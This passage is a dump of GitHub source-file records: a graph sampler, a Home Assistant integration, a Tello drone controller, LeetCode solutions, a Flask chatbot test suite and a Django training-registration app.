adj_list[chosen_edge_index]\n edge_number = chosen_edge[0]\n while edge_picked[edge_number]:\n chosen_edge_index = torch.randint(chosen_node_degree, size=(1,))[0]\n chosen_edge = adj_list[chosen_edge_index]\n edge_number = chosen_edge[0]\n chosen_edges[i] = edge_number\n edge_picked[edge_number] = True\n\n # visit target node\n other_vertex = chosen_edge[1]\n node_picked[other_vertex] = True\n\n # decrease sample counts\n node_weights[chosen_vertex] -= 1\n node_weights[other_vertex] -= 1\n\n # return chosen edges\n return iter(chosen_edges)\n\n def __len__(self): # noqa: D105\n return self.num_batches_per_epoch\n","repo_name":"MindRank-Biotech/PharmKG","sub_path":"model/pykeen/pykeen/src/pykeen/training/schlichtkrull_sampler.py","file_name":"schlichtkrull_sampler.py","file_ext":"py","file_size_in_byte":5271,"program_lang":"python","lang":"en","doc_type":"code","stars":45,"dataset":"github-code","pt":"47"} +{"seq_id":"7865133525","text":"\"\"\"The ONYX.CENTER integration.\"\"\"\nimport asyncio\nimport logging\nfrom datetime import timedelta\n\nimport voluptuous as vol\nfrom homeassistant.config_entries import ConfigEntry\nfrom homeassistant.const import (\n CONF_ACCESS_TOKEN,\n CONF_SCAN_INTERVAL,\n CONF_FORCE_UPDATE,\n EVENT_HOMEASSISTANT_STOP,\n)\nfrom homeassistant.core import HomeAssistant\nfrom homeassistant.helpers import config_validation as cv\nfrom homeassistant.helpers.debounce import Debouncer\nfrom homeassistant.helpers.update_coordinator import DataUpdateCoordinator\n\nfrom .api_connector import APIConnector\nfrom .const import (\n CONF_FINGERPRINT,\n DOMAIN,\n ONYX_API,\n ONYX_COORDINATOR,\n ONYX_TIMEZONE,\n)\n\n_LOGGER = logging.getLogger(__name__)\n\nONYX_SCHEMA = vol.Schema(\n vol.All(\n {\n vol.Required(CONF_FINGERPRINT): cv.string,\n vol.Required(CONF_ACCESS_TOKEN): cv.string,\n vol.Required(CONF_SCAN_INTERVAL): cv.positive_int,\n vol.Required(CONF_FORCE_UPDATE, default=False): cv.boolean,\n },\n )\n)\n\nCONFIG_SCHEMA = vol.Schema(\n {DOMAIN: vol.Schema(vol.All(cv.ensure_list, [ONYX_SCHEMA]))},\n extra=vol.ALLOW_EXTRA,\n)\n\nPLATFORMS = [\n \"cover\",\n \"sensor\",\n]\n\n\nasync def async_setup(hass: HomeAssistant, config: dict):\n \"\"\"Set up ONYX component via configuration.yaml.\"\"\"\n hass.data.setdefault(DOMAIN, {})\n return True\n\n\nasync def async_setup_entry(hass: HomeAssistant, entry: ConfigEntry):\n \"\"\"Set up ONYX from a config entry.\"\"\"\n hass.data.setdefault(DOMAIN, {})\n\n fingerprint = entry.data[CONF_FINGERPRINT]\n token = entry.data[CONF_ACCESS_TOKEN]\n scan_interval = entry.data[CONF_SCAN_INTERVAL]\n force_update = entry.data.get(CONF_FORCE_UPDATE, False)\n\n _LOGGER.debug(\"setting up %s integration with fingerprint %s\", DOMAIN, fingerprint)\n if force_update:\n _LOGGER.warning(\n \"Disabling partial updates. \"\n \"This may lead to a higher amount of API calls to Hella, \"\n \"and performance impacts. It is advised to not enable this option.\"\n )\n\n onyx_api = APIConnector(hass, fingerprint, token)\n await onyx_api.update()\n onyx_timezone = await onyx_api.get_timezone()\n\n coordinator = DataUpdateCoordinator(\n hass,\n _LOGGER,\n name=\"ONYX\",\n update_method=onyx_api.update,\n update_interval=timedelta(minutes=scan_interval),\n request_refresh_debouncer=Debouncer(hass, _LOGGER, cooldown=0, immediate=True),\n )\n\n def updated_device(device):\n onyx_api.updated_device(device)\n coordinator.async_set_updated_data(device)\n\n hass.bus.async_listen_once(EVENT_HOMEASSISTANT_STOP, onyx_api.stop)\n onyx_api.set_event_callback(updated_device)\n onyx_api.start(force_update)\n\n hass.data[DOMAIN][entry.entry_id] = {\n ONYX_API: onyx_api,\n ONYX_TIMEZONE: onyx_timezone,\n ONYX_COORDINATOR: coordinator,\n }\n\n for platform in PLATFORMS:\n hass.async_create_task(\n hass.config_entries.async_forward_entry_setup(entry, platform),\n )\n\n return True\n\n\nasync def async_unload_entry(hass: HomeAssistant, entry: ConfigEntry):\n \"\"\"Unload a config entry.\"\"\"\n unload_ok = all(\n await asyncio.gather(\n *[\n hass.config_entries.async_forward_entry_unload(entry, platform)\n for platform in PLATFORMS\n ]\n )\n )\n if unload_ok:\n hass.data[DOMAIN].pop(entry.entry_id)\n\n return unload_ok\n","repo_name":"muhlba91/onyx-homeassistant-integration","sub_path":"custom_components/hella_onyx/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":3504,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"47"} +{"seq_id":"11290955982","text":"\"\"\"\nThis module tends to allow user to take control of a TelloEDU drone\n\nThe _end_connection flag is raised when the ack is bad or when the drone is unreachable\n\"\"\"\n\nimport sys\nimport socket\nfrom time import sleep\nfrom PIL import Image\n\nfrom abstract_drone import AbstractDrone, AV_AVAILABLE, LIB_AVAILABLE\n\nclass TelloEDU(AbstractDrone):\n \"\"\"Class created to interact with the drone\"\"\"\n def __init__(self, tello_address=None, **kwargs):\n #Init the Abstract base class\n super().__init__(**kwargs)\n\n #If address isn't given\n if tello_address is None:\n connected_drones = self.get_all_drones()\n # print(connected_drones)\n if connected_drones == []:\n sys.tracebacklimit = 0\n raise InterruptedError('You are not connected to any drone')\n tello_address = connected_drones[0]\n # print('The connected Tello is the Tello with IP : ' + tello_address)\n\n self.tello_address = (tello_address, 8889)\n self._end_connection = self.test_drone_connection()\n if self.is_connected:\n print(self)\n self.init_drone_sockets()\n self.init_commands()\n\n def __repr__(self):\n return f'\\nI am a Tello EDU drone, my IP@ is {self.tello_address[0]}\\n'\n\n def __len__(self):\n return int(self.is_connected)\n\n def init_commands(self):\n \"\"\"Init drone SDK\"\"\"\n self.send('command')\n #Enable video streaming\n if self.video_stream:\n self.send('streamon')\n\n def test_drone_connection(self):\n \"\"\"\n Test if the drone is still connected\n Return True if the connection should end\n \"\"\"\n connected = self.still_connected(self.tello_address[0])\n if not connected:\n print('Drone is not reachable')\n return not connected\n\n def send(self, message, index: int = 0):\n \"\"\"Send message to drone using UDP Socket\"\"\"\n try:\n self.command_socket.sendto(message.encode(), self.tello_address)\n except (OSError, IndexError):\n self._end_connection = True\n print(f'{index}-Socket has already been closed')\n else:\n print(f'Drone {index} - Sending message: {message}')\n self.all_instructions.append(str(index) + '-' + message)\n finally:\n self.end_connection = self.test_drone_connection()\n\n def receive_ack(self):\n \"\"\"Use UDP socket to receive ack from each command we sended\"\"\"\n while self.is_connected:\n try:\n response, _ = self.command_socket.recvfrom(2048)\n print(f'Received message : {response.decode(\"utf-8\", \"ignore\")}')\n except (socket.timeout, ConnectionResetError, OSError):\n self._end_connection = True\n print('Drone is not reachable anymore')\n # print('ack thread done')\n\n def receive_state(self, parameters):\n \"\"\"Use UDP socket to receive all infos from the state channel\"\"\"\n sleep(2)\n while self.is_connected:\n try:\n last_state, _ = self.state_socket.recvfrom(2048)\n parameters = last_state.decode().split(';')[:-1]\n print(f'0-parameters : {parameters}')\n sleep(3)\n except Exception as exc:\n print(f'Error receiving: {exc}')\n print('Drone is not reachable anymore')\n\n def receive_frame(self):\n \"\"\"\n Use UDP socket to receive the video stream\n The video stream can only be used when you are directly connected to the drone WIFI (manufacturer restrictions)\n \"\"\"\n print('If you are not directly connected to drone Wifi, Video Stream is impossible')\n all_data = b''\n sleep(4)\n while self.is_connected:\n try:\n rcv_bytes, _ = self.videostream_socket.recvfrom(2048)\n\n all_data += rcv_bytes\n self.video_frames.add_data(rcv_bytes)\n\n # If it's the ending frame of a picture\n if len(rcv_bytes) != 1460:\n if LIB_AVAILABLE:\n ## IMAGE PROCESSING | Input = h264\n for frame in self.process_frame(all_data):\n picture = Image.fromarray(frame)\n self.last_frame = picture\n if AV_AVAILABLE:\n ## IMAGE PROCESSING | Input = h264\n for frame in self.process_frame():\n picture = Image.fromarray(frame)\n self.last_frame = picture\n all_data = b''\n\n except KeyboardInterrupt as exc:\n print(exc)\n except OSError:\n pass\n print('frame thread done')\n\nif __name__ == '__main__':\n my_tello = TelloEDU(video_stream=True, state_listener=False, back_to_base=False)\n\n # my_tello.init_flight_mode('act from file', filename='mission_file_idle.txt')\n # my_tello.init_flight_mode('picture mission', object_distance=(0, 100), object_dim=(40, 40, 20))\n my_tello.init_flight_mode('open pipe')\n # my_tello.init_flight_mode('reactive')\n my_tello.start_mission()\n","repo_name":"s-rigaud/pyTelloSDK","sub_path":"tello_edu.py","file_name":"tello_edu.py","file_ext":"py","file_size_in_byte":5284,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"47"} +{"seq_id":"846934138","text":"'''\n429. N-ary Tree Level Order Traversal\nGiven an n-ary tree, return the level order traversal of its nodes' values. (ie, \nfrom left to right, level by level).\n\nNote:\nThe depth of the tree is at most 1000.\nThe total number of nodes is at most 5000.\n'''\n\n'''\nALGORITHM:\nSame approach as Level order traversal for Binary Tree. \n\nRUNTIME COMPLEXITY : O(N)\nSPACE COMPLEXITY: O(N)\n'''\n\n\"\"\"\n# Definition for a Node.\nclass Node(object):\n def __init__(self, val, children):\n self.val = val\n self.children = children\n\"\"\"\nfrom collections import deque\n\nclass Solution(object):\n def levelOrder(self, root):\n \"\"\"\n :type root: Node\n :rtype: List[List[int]]\n \"\"\" \n if root == None:\n return []\n q = deque()\n res = []\n tmp = []\n q.extend([root, \"#\"])\n while len(q) > 1:\n node = q.popleft()\n if node == \"#\":\n q.append(\"#\")\n res.append(tmp)\n tmp = []\n else:\n tmp.append(node.val)\n if node.children:\n for c in node.children:\n q.append(c) \n res.append(tmp)\n return res \n\n\n","repo_name":"renukadeshmukh/Leetcode_Solutions","sub_path":"429_NaryTreeLevelOrderTraversal.py","file_name":"429_NaryTreeLevelOrderTraversal.py","file_ext":"py","file_size_in_byte":1225,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"47"} +{"seq_id":"73652692942","text":"\"\"\"Anthony Tran\r\nPSID: 1957342\r\nZyLab 5.22\"\"\"\r\n\r\nprint(\"Davy's auto shop services\\nOil change -- $35\\nTire rotation -- $19\\nCar wash -- $7\\nCar wax -- $12\\n\")\r\nprint('Select first service:')\r\nfirst = input('')\r\nprint('Select second service:')\r\nsecond = input('')\r\n\r\nserv1 = ''\r\ncost = 0\r\nif first == 'Oil change':\r\n cost = 35\r\n serv1 = 'Service 1: Oil change, $35'\r\nelif first == 'Tire rotation':\r\n cost = 19\r\n serv1 = 'Service 1: Tire rotation, $19'\r\nelif first == 'Car wash':\r\n cost = 7\r\n serv1 = 'Service 1: Car wash, $7'\r\nelif first == 'Car wax':\r\n cost = 12\r\n serv1 = 'Service 1: Car wax, $12'\r\nelse:\r\n serv1 = 'Service 1: No service'\r\n\r\nserv2 = ''\r\ncost2 = 0\r\nif second == 'Oil change':\r\n cost2 = 35\r\n serv2 = 'Service 2: Oil change, $35'\r\nelif second == 'Tire rotation':\r\n cost2 = 19\r\n serv2 = 'Service 2: Tire rotation, $19'\r\nelif second == 'Car wash':\r\n cost2 = 7\r\n serv2 = 'Service 2: Car wash, $7'\r\nelif second == 'Car wax':\r\n cost2 = 12\r\n serv2 = 'Service 2: Car wax, $12'\r\nelse:\r\n serv2 = 'Service 2: No service'\r\n\r\nprint(\"\\nDavy's auto shop invoice\\n\")\r\nprint(serv1)\r\nprint(serv2)\r\n\r\nprint('\\nTotal: ', '$', (cost + cost2), sep='')\r\n","repo_name":"altran28/2344-1st","sub_path":"Homework1/ZyLab_5_22.py","file_name":"ZyLab_5_22.py","file_ext":"py","file_size_in_byte":1201,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"22872699929","text":"#https://leetcode.com/problems/swap-nodes-in-pairs/description/\n#time O(N), space O(1)\n\n# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, val=0, next=None):\n# self.val = val\n# self.next = next\nclass Solution:\n def swapPairs(self, head: Optional[ListNode]) -> Optional[ListNode]:\n dummyHead = ListNode(-1,head)\n prev = dummyHead\n cur = head\n while cur and cur.next:\n node1 = cur\n node2 = cur.next\n next = node2.next\n prev.next = node2\n node2.next = node1\n node1.next = next\n prev = node1\n cur = next\n return dummyHead.next\n\n","repo_name":"SitongChe/LeetCode","sub_path":"LinkedList/_24SwapNodesinPairs.py","file_name":"_24SwapNodesinPairs.py","file_ext":"py","file_size_in_byte":695,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"7441706007","text":"from string import ascii_letters\n\n\ndef all_anagrams(string: str):\n \"\"\"\n For given string s, find all possible anagrams\n :param string: str -> string s for finding anagrams\n :return: list of possible anagrams\n \"\"\"\n ls = string.split(\" \")\n dic = {}\n for word in ls:\n s = \"\".join(sorted(word))\n if s not in dic:\n dic[s] = [word]\n else:\n dic[s].append(word)\n answer = [dic[word] for word in dic if len(dic[word]) >= 2]\n return answer\n\n\ndef levenshtein(string_a: str, string_b: str) -> int:\n \"\"\"\n Given two strings string_a and string_b how many operations are required to convert string_b to string_a\n Available operations - Insertion, deletion and substitution\n \"\"\"\n length_a = len(string_a)\n length_b = len(string_b)\n\n table = [[i + j for j in range(length_b + 1)] for i in range(length_a + 1)]\n for i in range(length_a):\n for j in range(length_b):\n table[i + 1][j + 1] = min(table[i][j + 1] + 1,\n table[i + 1][j] + 1,\n table[i][j] + int(string_a[i] != string_b[j]))\n return table[length_a][length_b]\n\n\nif __name__ == \"__main__\":\n print(all_anagrams(\"ramo mora lex xsl sxl\"))\n","repo_name":"patel-dhairya/Python-Algo","sub_path":"StringAlgos.py","file_name":"StringAlgos.py","file_ext":"py","file_size_in_byte":1269,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"72774306704","text":"from Clases.Datos import datos, error\nfrom Clases.DatosOrden import dtCabecera, dtOrden\nimport re\n\nclass AnalizarOrden:\n def __init__(self, ruta,opciones):\n self.ruta=ruta\n self.Linea=1\n self.texto=\"\"\n self.g=0\n self.ListaTokens=[]\n self.ListaErrores=[]\n self.opciones=opciones\n self.header=None\n self.ListaOrden=[]\n self.leerArchivo()\n\n\n def leerArchivo(self):\n archivo=open(self.ruta,'r', encoding='utf8')\n for linea in archivo:\n self.texto+=linea\n if linea!=\"\\n\":\n self.g+=1\n archivo.close() \n self.texto+=\"\\n\"\n self.analizar()\n \n def analizar(self):\n estado=0\n posicion=0\n columna=1\n string=\"\"\n cant=0\n noIdentificados=\"~!@#$%^&*()_+-|;\\/¿¡?{[}]´.\"\n noIdentificados2=\"~!@#$%^&*()+-|;\\/¿¡?{[}]´.\"\n cliente=\"\"\n nit=\"\"\n direccion=\"\"\n cont=0\n longitud=len(self.texto)\n while posicion2:\n aux=float(txt)\n redondeado = round(aux, 2)\n if aux<=100:\n return str(redondeado)\n else:\n return \"Formato inválido, la propina debe ser menor al 100%\"\n elif len(cadena[1])==2:\n aux=float(txt)\n if aux<=100:\n return txt\n else:\n return \"Formato inválido, la propina debe ser menor al 100%\"\n elif len(cadena[1])==1:\n aux=float(txt)\n if aux<=100:\n return txt\n else:\n return \"Formato inválido, la propina debe ser menor al 100%\"\n else:\n return \"Formato inválido, se esperaba digitos despues del punto\"\n\n elif cont>1:\n return \"Formato inválido, contiene mas dos puntos\"\n\n elif cont==0:\n if txt.isdigit():\n aux=float(txt)\n if aux<=100:\n return txt\n else:\n return \"Formato inválido, la propina debe ser menor al 100%\"\n else:\n return \"Formato inválido, no son digitos\"\n\n def getListaTokens(self):\n return self.ListaTokens\n \n def getListaErrores(self):\n return self.ListaErrores\n\n def getCabeceras(self):\n return self.header\n\n def getOrden(self):\n return self.ListaOrden\n\n #print(self.contLinea, self.reservada, self.cadena, self.opciones, self.error)\n'''\na=AnalizarOrden(\"Archivos_Prueba\\Orden.txt\",\"as\")\na.imprimirTokens()\na.imprimirErrores()\n'''\n","repo_name":"DanielDubonDR/LFP-Proyecto1_201901772","sub_path":"ProcesarOrden.py","file_name":"ProcesarOrden.py","file_ext":"py","file_size_in_byte":13891,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"39862274494","text":"from collections import deque\n\nn = int(input())\nG = [[] for _ in range(n + 1)]\nfor _ in range(n - 1):\n a, b = map(int, input().split())\n G[a].append(b)\n G[b].append(a)\n\n\ndef dfs(start):\n queue = deque([(start, True)])\n visited = [False] * (n + 1)\n a_half = []\n b_half = []\n while queue:\n node, b = queue.pop()\n visited[node] = True\n if b:\n a_half.append(node)\n else:\n b_half.append(node)\n for adj in G[node]:\n if not visited[adj]:\n queue.append((adj, not b))\n return a_half, b_half\n\n\na_half, b_half = dfs(1)\nif len(a_half) >= n // 2:\n ans = a_half\nelse:\n ans = b_half\nprint(*ans[: n // 2], sep=' ')\n","repo_name":"yutake27/Atcoder","sub_path":"typical90/026/026.py","file_name":"026.py","file_ext":"py","file_size_in_byte":715,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"32592875049","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Nov 27 21:18:29 2016\n\n@author: Jonas\n\"\"\"\n\n\"\"\"\nIn this file we create a mongodb database and collections for the Pitchfork\nreview!\n\"\"\"\n\n\nfrom pymongo import MongoClient\n\nconn = MongoClient()\npitchfork = conn.pitchfork\nreviews = pitchfork.review\nreviews.create_index([('itemPages', pymongo.ASCENDING)],unique=True)\n\n","repo_name":"JonasMoss/Pitchfork-scraping","sub_path":"pitchfork_mongo_db_creator.py","file_name":"pitchfork_mongo_db_creator.py","file_ext":"py","file_size_in_byte":357,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"5562614432","text":"import sys\nfrom os.path import dirname, join\nsys.path.append(join(dirname(__file__),\"..\"))\nimport unittest\nimport app\nimport unittest.mock as mock\nfrom app import bot_response_api\nfrom app import *\nfrom app import db\nimport json \n\n\n\nKEY_INPUT = \"input\"\nKEY_EXPECTED = \"expected\"\nKEY_LENGTH = \"length\"\nKEY_FIRST_WORD = \"first_word\"\nKEY_SECOND_WORD = \"second_word\"\n\n\nclass MockResponse:\n def __init__(self, json_data, status_code):\n self.json_data = json_data\n self.status_code = status_code\n\n def json(self):\n return self.json_data\n\n\nclass ChatbotTestCase(unittest.TestCase):\n def setUp(self):\n self.success_test_funtranslate = [\n {\n KEY_INPUT: \"!! funtranslate Master Obiwan has lost a planet.\",\n KEY_EXPECTED: \"Lost a planet, master obiwan has.\"\n },\n \n ]\n self.failure_test_funtranslate = [\n {\n KEY_INPUT: \"!! funtranslate Master Obiwan has lost a planet.\",\n KEY_EXPECTED: \"Error: Translate limit hit: try in an hour\" \n },\n \n ]\n \n self.failure_test_params = [\n {\n KEY_INPUT: \"!! tamil-translate coconuts\",\n KEY_EXPECTED: \"my name is\"\n },\n \n ]\n self.error_tamil_translate_test_params = [\n {\n KEY_INPUT: \"!! tamil-translate\",\n KEY_EXPECTED: \"Error: text not given\" \n },\n ]\n \n \n self.success_test_text_to_binary = [\n {\n KEY_INPUT: \"!! text-to-binary hello\",\n KEY_EXPECTED: \"0110100001100101011011000110110001101111\" \n },\n ] \n \n self.success_random_fact= [\n {\n KEY_INPUT: \"!! random-fact\",\n KEY_EXPECTED: \"In a test performed by Canadian scientists, using various different styles of music, it was determined that chickens lay the most eggs when pop music was played.\" },\n ] \n \n #MOCKED TESTS\n def mocked_funtranslate_success(self,link, params):\n if link == \"https://api.funtranslations.com/translate/yoda.json\":\n dicts = {\"contents\": {\"translated\": \"Lost a planet, master obiwan has.\"}}\n return MockResponse(dicts, 200)\n \n def mocked_funtranslate_failure(self,link, params):\n dicts = {\"error\": {\"translated\": \"Lost a planet, master obiwan has.\"}}\n return MockResponse(dicts, 200)\n \n def mocked_text_to_binary_success(self,link, params):\n dicts = {'binary': '0110100001100101011011000110110001101111'}\n return MockResponse(dicts, 200) \n \n def mocked_random_fact_success(self,link):\n dicts = {'text': 'In a test performed by Canadian scientists, using various different styles of music, it was determined that chickens lay the most eggs when pop music was played.'}\n return MockResponse(dicts, 200) \n \n def mocked_add_to_db_and_emit(self, text): \n print(\"here\")\n \n def mocked_db(self):\n mocked_db = UnifiedAlchemyMagicMock()\n return mocked_db\n #----------------------------------------------------------------- \n def test_funtranslate_success(self):\n for test_case in self.success_test_funtranslate:\n with mock.patch('requests.get', self.mocked_funtranslate_success):\n funtranslate = bot_response_api(test_case[KEY_INPUT])\n expected = test_case[KEY_EXPECTED]\n self.assertEqual(funtranslate, expected)\n \n def test_funtranslate_failure(self):\n for test_case in self.failure_test_funtranslate:\n with mock.patch('requests.get', self.mocked_funtranslate_failure):\n funtranslate = bot_response_api(test_case[KEY_INPUT])\n expected = test_case[KEY_EXPECTED]\n self.assertEqual(funtranslate, expected)\n \n def test_text_to_binary_success(self):\n for test_case in self.success_test_text_to_binary:\n with mock.patch('requests.get', self.mocked_text_to_binary_success):\n text_to_binary = bot_response_api(test_case[KEY_INPUT])\n expected = test_case[KEY_EXPECTED]\n self.assertEqual(text_to_binary, expected)\n \n def test_random_fact_success(self):\n for test_case in self.success_random_fact:\n with mock.patch('requests.get', self.mocked_random_fact_success):\n text_to_binary = bot_response_api(test_case[KEY_INPUT])\n expected = test_case[KEY_EXPECTED]\n self.assertEqual(text_to_binary, expected)\n \n #__________________________________________________________________________________________ \n #__________________________________________________________________________________________\nclass SQLObject:\n def __init__(self, message):\n self.message = message\n \nclass Table:\n def __init__(self, message):\n return\n def all(self):\n return [SQLObject(\"test message\")]\n \nclass SessionObject:\n def __init__(self):\n return\n def add(self, table):\n return\n def commit(self): \n return\n def query(self, message):\n return Table(message)\n \nclass db_Test(unittest.TestCase):\n def setUp(self):\n self.success_add_to_db = [\n {\n KEY_INPUT:\"hello\",\n KEY_EXPECTED: None\n },\n ] \n \n def test_database_success(self):\n for test_case in self.success_add_to_db:\n with mock.patch('app.db.session', SessionObject()):\n response = add_to_db_and_emit(test_case[KEY_INPUT])\n expected = test_case[KEY_EXPECTED]\n self.assertEqual(response, expected)\n \nclass DBObject:\n def __init__(self):\n return\n def init_app(self, app):\n return\n def app(self):\n return\n def create_all(self):\n return \n def session(self):\n return DBObjectSession()\n \nclass db_Initialize(unittest.TestCase):\n def setUp(self):\n self.success_initialize_db = [\n {\n KEY_EXPECTED: None\n },\n ] \n \n def test_database_initialization(self):\n for test_case in self.success_initialize_db:\n with mock.patch('app.db', DBObject()):\n with mock.patch('app.db.session', SessionObject()):\n response = init_db(app)\n expected = test_case[KEY_EXPECTED]\n self.assertEqual(response, expected)\n #__________________________________________________________________________________________ \n #__________________________________________________________________________________________\nclass emit_all_test(unittest.TestCase):\n def setUp(self):\n self.success_emit_all = [\n {\n KEY_INPUT:[\"test channel\", \"test_sid\"],\n KEY_EXPECTED: None\n },\n ] \n \n def test_emit_all(self):\n for test_case in self.success_emit_all:\n with mock.patch('app.db.session', SessionObject()):\n channel = test_case[KEY_INPUT][0]\n sid = channel = test_case[KEY_INPUT][1]\n response = emit_all_from_database(channel,sid)\n expected = test_case[KEY_EXPECTED]\n self.assertEqual(response, expected) \n#__________________________________________________________________________________________ \n#__________________________________________________________________________________________\n\nclass FlaskObj:\n def __init__(self):\n return\n def render_template(self, html):\n return html\n \nclass render_template_test(unittest.TestCase):\n def setUp(self):\n self.success_render_template = [\n {\n #KEY_INPUT:[\"test channel\", \"test_sid\"],\n KEY_EXPECTED: \"index.html\"\n },\n ] \n \n def test_render_template(self):\n for test_case in self.success_render_template:\n with mock.patch('app.flask', FlaskObj()):\n response = hello()\n expected = test_case[KEY_EXPECTED]\n self.assertEqual(response, expected) \n#__________________________________________________________________________________________ \n#__________________________________________________________________________________________\n\nclass RequestObj:\n def __init__(self):\n return\n def sid(self):\n return \"test_sid\"\n \nclass new_google_user_test(unittest.TestCase):\n def setUp(self):\n self.success_google_user = [\n {\n KEY_INPUT:{\"name\":\"test data\"},\n KEY_EXPECTED: None\n },\n ] \n def emit_all_from_db(self, channel, sid):\n return None\n def test_render_template(self):\n for test_case in self.success_google_user:\n with mock.patch('app.request', RequestObj()):\n with mock.patch('app.db.session', SessionObject()):\n response = on_new_google_user(test_case[ KEY_INPUT])\n expected = test_case[KEY_EXPECTED]\n self.assertEqual(response, expected) \n#__________________________________________________________________________________________ \n#__________________________________________________________________________________________\nclass new_data_test(unittest.TestCase):\n def setUp(self):\n self.success_new_data = [\n {\n KEY_INPUT:{\"new message\":\"test message\"},\n KEY_EXPECTED: None\n },\n {\n KEY_INPUT:{\"new message\":\"!! about\"},\n KEY_EXPECTED: None\n },\n ] \n def add_to_db_and_emit(self, msg):\n return None\n def test_new_message(self):\n for test_case in self.success_new_data:\n with mock.patch('app.request', RequestObj()):\n with mock.patch('app.db.session', SessionObject()):\n \n response = on_new_data(test_case[ KEY_INPUT])\n expected = test_case[KEY_EXPECTED]\n self.assertEqual(response, expected)\n \n \n \n \n\nif __name__ == '__main__':\n unittest.main()","repo_name":"AaratiS12/ChatBot","sub_path":"tests/mocked_unit_test.py","file_name":"mocked_unit_test.py","file_ext":"py","file_size_in_byte":10589,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"17173942935","text":"from rest_framework import viewsets\nfrom .serializers import TodoSerializer\nfrom django.views import View\nimport os\nfrom rest_framework.parsers import MultiPartParser, FormParser, JSONParser, FileUploadParser\nfrom templated_email import send_templated_mail\nfrom rest_framework.views import APIView\nfrom rest_framework.response import Response\nfrom rest_framework import status\nfrom django_filters.rest_framework import DjangoFilterBackend, filters\nfrom rest_framework import permissions\nfrom rest_framework.permissions import IsAdminUser\nimport django_filters\nfrom rest_framework.pagination import PageNumberPagination\nfrom rest_framework.generics import RetrieveUpdateAPIView\nfrom rest_framework.mixins import UpdateModelMixin\nfrom rest_framework import generics\nfrom rest_framework.authtoken.models import Token\nimport json\nfrom django.db.models import F\nfrom django.http import HttpResponse, HttpRequest, HttpResponseNotFound\nfrom django.shortcuts import render, redirect, get_object_or_404\nfrom django.http import HttpResponse\nfrom django.core.mail import send_mail\nfrom inspect import getmembers\nfrom pprint import pprint\nimport string\nimport random\nimport uuid\n\nfrom django.contrib.auth.models import User\n\nfrom .models import Post, EventRegistration, Profile, VerificationKey, TrainingGroup, Todo\nfrom .serializers import (TrainingSerializer, ProfileSerializer, ResetPasswordEmailRequestSerializer,\n EventRegistrationSerializer, VerificationKeySerializer, TrainingGroupSerializer)\n\nfrom django.views.decorators.csrf import csrf_exempt\n\nclass TodoView(viewsets.ModelViewSet):\n serializer_class = TodoSerializer\n queryset = Todo.objects.all()\n\n\nclass Assets(View):\n\n def get(self, _request, filename):\n path = os.path.join(os.path.dirname(__file__), 'static', filename)\n\n if os.path.isfile(path):\n with open(path, 'rb') as file:\n return HttpResponse(file.read(), content_type='application/javascript')\n else:\n return HttpResponseNotFound()\n\n\nclass CoachTrainingCreatePermission(permissions.BasePermission):\n def has_permission(self, request, view):\n token = request.META['HTTP_AUTHORIZATION']\n print('TokeN', token)\n user = Profile.objects.get(pk=token)\n coach = user.is_coach\n return coach\n\n\nclass TrainingViewSet(viewsets.ModelViewSet):\n serializer_class = TrainingSerializer\n queryset = Post.objects.all()\n\n\n# from rest_framework.generics import (\n# ListAPIView,\n# RetrieveAPIView,\n# CreateAPIView,\n# DestroyAPIView,\n# UpdateAPIView,\n# )\n\n\nfrom rest_framework.permissions import IsAdminUser\n\n\n# class TrainingListView(ListAPIView):\n# queryset = Post.objects.all()\n# serializer_class = TrainingSerializer\n#\n#\n# class TrainingDetailView(RetrieveAPIView):\n# queryset = Post.objects.all()\n# serializer_class = TrainingSerializer\n#\n#\n# class TrainingCreateView(CreateAPIView):\n# queryset = Post.objects.all()\n# serializer_class = TrainingSerializer\n# permission_classes = [IsAdminUser]\n#\n#\n# class TrainingUpdateView(UpdateAPIView):\n# queryset = Post.objects.all()\n# serializer_class = TrainingSerializer\n#\n#\n# class TrainingDeleteView(DestroyAPIView):\n# queryset = Post.objects.all()\n# serializer_class = TrainingSerializer\n\n@csrf_exempt\ndef event_add_attendance(request, pk):\n print('request method', request.method)\n if request.method == \"POST\":\n data = json.loads(request.body)\n print(data['pk'], data['profile'], data['organizeremail'])\n trainingtitle = data['trainingtitle']\n trainingdate = data['trainingdate']\n training_starttime = data['training_start_time']\n training_endtime = data['training_end_time']\n training_sport = data['training_sport']\n event_time = data['eventtime']\n event_date = data['eventdate']\n registration_time = data['registration_time']\n name = data['name']\n email = data['email']\n organizeremail = data['organizeremail']\n profilePK = data['profile']\n profile = Profile.objects.get(pk=profilePK)\n pk = data['pk']\n training = Post.objects.get(pk=pk)\n print('Saadud treening', training)\n training.registrations_made = F('registrations_made') + 1\n training.save()\n training.add_user_to_list_of_attendees(profile=profile, pk=training.pk, event_time=event_time,\n event_date=event_date)\n if_send_email = training.send_registrations\n if if_send_email:\n send_templated_mail(\n template_name='welcome',\n from_email='fitexsport.info@gmail.com',\n recipient_list=[organizeremail],\n context={\n 'email': email,\n 'name': name,\n 'trainingtitle': trainingtitle,\n 'trainingsdate': trainingdate,\n 'training_starttime': training_starttime,\n 'training_endtime': training_endtime,\n 'registrationtime': registration_time,\n 'sport': training_sport,\n },\n )\n return HttpResponse(status=200)\n\n\n@csrf_exempt\ndef group_add_user_to_requesting(request, pk):\n if request.method == \"POST\":\n data = json.loads(request.body)\n group_id = data['groupID']\n group = TrainingGroup.objects.get(pk=group_id)\n profile_id = data['token']\n profile = Profile.objects.get(pk=profile_id)\n group.add_user_to_requesting(profile)\n return 